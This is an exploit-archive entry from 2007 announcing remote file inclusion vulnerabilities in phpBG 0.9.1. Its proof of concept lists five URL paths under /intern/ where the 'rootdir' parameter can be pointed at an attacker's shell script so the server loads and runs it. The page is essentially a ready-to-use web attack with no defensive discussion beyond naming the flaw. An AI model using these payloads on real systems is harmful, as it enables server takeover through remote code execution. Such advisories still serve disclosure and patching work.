phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerabilities
# Published : 2007-08-29
# Author : GoLd_M
# Previous Title : PHPNS 1.1 (shownews.php id) Remote SQL Injection Vulnerability
# Next Title : Pakupaku CMS <= 0.4 Remote File Upload / LFI Vulnerability

# phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerability
# D.Script: http://phpbg.sourceforge.net/
# POC:
#   /intern/admin/other/backup.php?admin=1&rootdir=Shell
#   /intern/admin/?rootdir=Shell
#   /intern/clan/member_add.php?rootdir=Shell
#   /intern/config/key_2.php?rootdir=Shell
#   /intern/config/forum.php?rootdir=Shell
# Discovered by: GoLd_M = [Mahmood_ali]
# Thanx To : Tryag-Team & Asbmay's Group & All My Friends

# www.Syue.com [2007-08-29]